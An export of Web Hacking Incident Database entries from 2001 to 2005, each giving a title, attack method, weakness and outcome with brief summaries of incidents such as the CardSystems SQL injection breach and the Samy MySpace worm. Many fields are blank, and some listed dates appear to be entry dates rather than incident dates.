Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-26: NISCC reveals SAP R/3 security flaw
WHID ID: 2005-26
Date Occured: 7/31/2005
Attack Method: Path Traversal
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-25: No Charges Filed Yet Against South Charlotte Computer Hacker
WHID ID: 2005-25
Date Occured: 7/31/2005
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A man hacked into a competing web site

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-24: Firefox marketing site hacked
WHID ID: 2005-24
Date Occured: 7/15/2005
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-23: Chinese hacker held in Web data theft
WHID ID: 2005-23
Date Occured: 7/11/2005
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The hacker who penetrated Kakaku.com was arrested after breaking into Club Tourism International Inc. Hacking was done in order to earn money to pay for tuition.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-22: MS UK defaced in hacking attack
WHID ID: 2005-22
Date Occured: 7/11/2005
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Microsoft UK site defaced due to server misconfiguration

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-21: Insufficient authentication on USC admissions site allowed access to applicants data
WHID ID: 2005-21
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A person who discovered an SQL injection vulnerability in a USC system and informed security focus about the flaw was criminally charged with breaking into the system.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-20: Security gaps found in EPA contracting system
WHID ID: 2005-20
Date Occured: 2/26/2006
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An audit of a major Environmental Protection Agency contract management system uncovered significant security lapses that, if exploited by hackers, could have serious consequences for the agency's operations, assets and personnel. The audit focused on lack of monitoring for known vulnerabilities on these systems.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-19: Privacy Fears due to insufficient authentication on CVS drugstore chain web site
WHID ID: 2005-19
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-18: Hacker hits Duke system
WHID ID: 2005-18
Date Occured:
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-17: Leakage of information due to XSS in Hotmail
WHID ID: 2005-17
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-16: MSN site hacked in South Korea
WHID ID: 2005-16
Date Occured:
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Session Hijacking
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The web site was modified to include password stealing code

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-15: Unprotected information on the University of Chicago web site
WHID ID: 2005-15
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Files containing sensitive information left unprotected on the web server

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-14: XSS on Microsoft Xbox site allowed phishing
WHID ID: 2005-14
Date Occured: 11/8/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-13: Hacker attacked weak point on Kakaku.com's Web Site
WHID ID: 2005-13
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Downtime
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-12: Insufficient authentication on Arbela mutual insurance allowed access to private data
WHID ID: 2005-12
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Extranet system accessible to the public

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-11: Samy XSS Worm Hits MySpace
WHID ID: 2005-11
Date Occured: 11/8/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

The Samy worm at my space is now a classic, both a sophisticated attack and a well documented one, it became a case study in the web application security field. Recently Robert Hansen (RSnake) wrote a very interesting blog entry about Samy and what happened to him since.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-10: Indian SATs results leaking
WHID ID: 2005-10
Date Occured: 11/8/2005
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-9: Undisclosed application security issue on Cisco's site forces global passwords reset
WHID ID: 2005-9
Date Occured: 4/8/2005
Attack Method: Abuse of Functionality
Application Weakness: Insecure Indexing
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An undisclosed application security issue on Cisco web site required resetting passwords for all registered users.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-8: eBay Redirect Becomes Phishing Tool
WHID ID: 2005-8
Date Occured:
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-7: Hacker Tips Off B-School Applicants
WHID ID: 2005-7
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Parameter tampering to jump into someone else's account data

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-6: Tampering with parameters allows access to others account data on PayMaxx Inc. site
WHID ID: 2005-6
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Parameter tampering enabled jumping into someone else's account data on PayMaxx Inc. site

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-5: Paris Hilton's T-Mobile online account hacked
WHID ID: 2005-5
Date Occured: 7/11/2005
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Details remain sketchy, but news reports include social engineering, a guessable secret question for password recovery, and a known vulnerability is BEA WebLogic

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-4: An Israeli debate site vulnerable to XSS
WHID ID: 2005-4
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An Israeli public debates site called Hyde Park has an XSS vulnerability that exposes session cookies.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-3: Misconfiguration issues in paid wireless access and billing applications
WHID ID: 2005-3
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Directory Indexing
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Multiple misconfiguration problems such as browsable directories, physical path revealing and default or weak passwords

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-2: Froogle XSS
WHID ID: 2005-2
Date Occured: 7/11/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS was found in Froogle

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-1: Gmail Bug Exposes E-mails messages of other users
WHID ID: 2005-1
Date Occured: 7/11/2005
Attack Method: Predictable Resource Location
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Parameter tampering enabled exposing sensitive information in G-Mail

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-18: Security flaw exposed in Cahoot bank accounts
WHID ID: 2004-18
Date Occured: 10/25/2007
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Following a software upgrade, Cahoot, a UK based Internet only bank allowed accessing user accounts by guessing their user names. At least on one page allowed accessing an account by only specifying the user name in the URL. The bug was open for 12 days before being discovered.


The site was taken off line for 10 hours to fix the issue. It is a significant incident, as it is one of those rare occasions where vulnerability was serious enough to force the organization to just take the site off line until it is fixed.


We somehow missed this story so it finds its way to WHID only now in late 2007.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-17: The CardSystems breach was an SQL Injection hack (Updated)
WHID ID: 2004-17
Date Occured: 4/20/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Finance
Attacked Entity Geography:
Incident Description:

Update (May 27th 2009) - The CardSystems incident is refusing to die. Merrick Back is now suing Savvis for certifying CardSystems as CISP compliant while it systems where wide open. CISP is a VISA program for certifying credit card processing systems which existed prior to PCI DSS.

The actual damage to an organization of an attack is rarely disclosed, and coverage focuses on the Number_of_Records stolen. In the court documents Merrick reveals that its own damage from the CardSystems incident was $16,000,000! The money was paid to card holders to compensate for losses and for legal fees and fines.

The case is also interesting as it put to test the liability of the certifying entity (in this case Savvis) resulting from assessing. The results may have profound influence on the PCI QSA market and therefore PCI itself. David Navetta posts an excellent legal analysis of the potential implications of the lawsuit.


This entry is a very important one. Most are already familiar with the infamous CardSystems incident where hackers stole 263,000 credit card numbers, exposed 40 million more and several million dollars fraudulent credit and debit card purchases had been made with these counterfeit cards. As a result of the breach CardSystems nearly went out of business and was eventually purchased by PayByTouch. CardSystems is considered by many the most severe publicized information security breach ever and it caused company share holders, financial institutes and card holders damage of millions of dollars.

But since the publication of the incident a year ago the way in which the breach occurred remained a mystery.

Recently new articles about the case (listed below) revealed that SQL injection was used by the attackers to install malicious script on the CardSystems web application database which where scheduled to run every four days, extract records, zip them and export them to an FTP site.

This is one of the most stunning examples where a web application security hole was used to launch a targeted attack in order to steal money.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked: Credit Card Number
Number of Records: 40000000
Additional Link:
Entry Title: WHID 2004-16: Lycos Free Email XSS
WHID ID: 2004-16
Date Occured: 7/11/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS was found in Lycos Web Mail

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-15: New Variant of Santy Worm Spreads
WHID ID: 2004-15
Date Occured: 12/25/2004
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Worm
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

phpBB worm

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: phpBB
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-14: Santy worm defaces websites using PHP bug
WHID ID: 2004-14
Date Occured: 12/22/2004
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Worm
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

Worm used Google to locate sites vulnerable to OS

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Various
Attacked System Technology: phpBB
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-13: SunTrust site XSS vulnerability exploited by for phishing
WHID ID: 2004-13
Date Occured: 11/8/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Phishing based on XSS (Same vulnerability but a different attack that the similar September 2004 attack)

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-12: XSS in Gmail
WHID ID: 2004-12
Date Occured: 7/11/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS was found in G-Mail

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-11: Phishers Manipulate SunTrust Site to Steal Data
WHID ID: 2004-11
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

Phishing based on XSS

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-10: SQL Injection and XSS on presidential campaign web sites
WHID ID: 2004-10
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

C:UsersOfer ShezafDocuments

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-9: Billing and personal information leakage due to lack of authentication on a phone company web site
WHID ID: 2004-9
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A billing information system required only phone number and zip code to pull up account details

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-8: Broadcast TV announcements changed by hacking the stations web site
WHID ID: 2004-8
Date Occured:
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Process Validation
Outcome: Disinformation
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Previously moderated weather announcements could be changed by the user

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-7: More Scary Tales Involving Big Holes In Web-Site Security - University Sub Service
WHID ID: 2004-7
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.cs.umass.edu/~kevinfu/news/wsj-gomes2.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-6: More Scary Tales Involving Big Holes In Web-Site Security - Tiffany
WHID ID: 2004-6
Date Occured: 8/4/2005
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-5: More Scary Tales Involving Big Holes In Web-Site Security - Gateway
WHID ID: 2004-5
Date Occured: 8/4/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-4: More Scary Tales Involving Big Holes In Web-Site Security - Kohl's
WHID ID: 2004-4
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-3: More Scary Tales Involving Big Holes In Web-Site Security - Iomega
WHID ID: 2004-3
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-2: Biggest Web Problem Isn't About Privacy, It's Sloppy Security - Saks
WHID ID: 2004-2
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.cs.umass.edu/~kevinfu/news/wsj-gomes1.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-1: Biggest Web Problem Isn't About Privacy, It's Sloppy Security - OpenTable
WHID ID: 2004-1
Date Occured: 8/4/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-9: Defenses lacking at social network sites
WHID ID: 2003-9
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-8: SQL Injection in PetCo.com leads to FTC investigation
WHID ID: 2003-8
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-7: Victoria's Secret reveals far too much
WHID ID: 2003-7
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

View other customers orders by changing a sequential number within a URL parameter

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-6: Mississippi man blackmails Best Buy
WHID ID: 2003-6
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A person convicted of blackmailing Best Buy. He threatened to expose a breach in the company's web site if not paid $2.5 million.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-5: Car shoppers' credit details exposed in bulk
WHID ID: 2003-5
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

User submitted information was being stored in a publicly available location. The URL found in the source code of a publicly available web page.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-4: SQL injection on Guess site triggers an FTC inquiry
WHID ID: 2003-4
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-3: User passwords could be stolid in Microsoft's Passport service
WHID ID: 2003-3
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Password Recovery
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-2: UT Austin hack yields personal info on thousands
WHID ID: 2003-2
Date Occured: 4/4/2006
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While an old incident, further research into it suggest that it was a web hack. While the initial reports talk about a database break in, a report in the Register identify the database as txClass, which is a web based system.
55,200 social security numbers where stolen, though the hacker claimed that he did not perform the act for profit. He was caught and sentenced to 5 years probation.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-1: FTD.com hole leaks personal information
WHID ID: 2003-1
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

View other customers information by modifying a cookie

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-4: Tower Records settles charges over hack attacks
WHID ID: 2002-4
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

View other customers orders by changing a guessable number within a URL parameter

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-3: Reuters accused of hacking
WHID ID: 2002-3
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A company put its earnings report on site before its official release, but did not linked to it. Reuters found the document and published it.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-2: Advogato XSS virus account
WHID ID: 2002-2
Date Occured: 7/11/2005
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-1: Flawed authentication at BN.com exposes personal information
WHID ID: 2002-1
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Opening an account with a discontinued e-mail address exposes all the information of the discontinues account

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-6: XSS at Microsoft Passport
WHID ID: 2001-6
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pcworld.com/news/article/0,aid,69543,00.asp
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-5: Privacy hole found in Verizon Wireless Web site
WHID ID: 2001-5
Date Occured: 9/6/2001
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
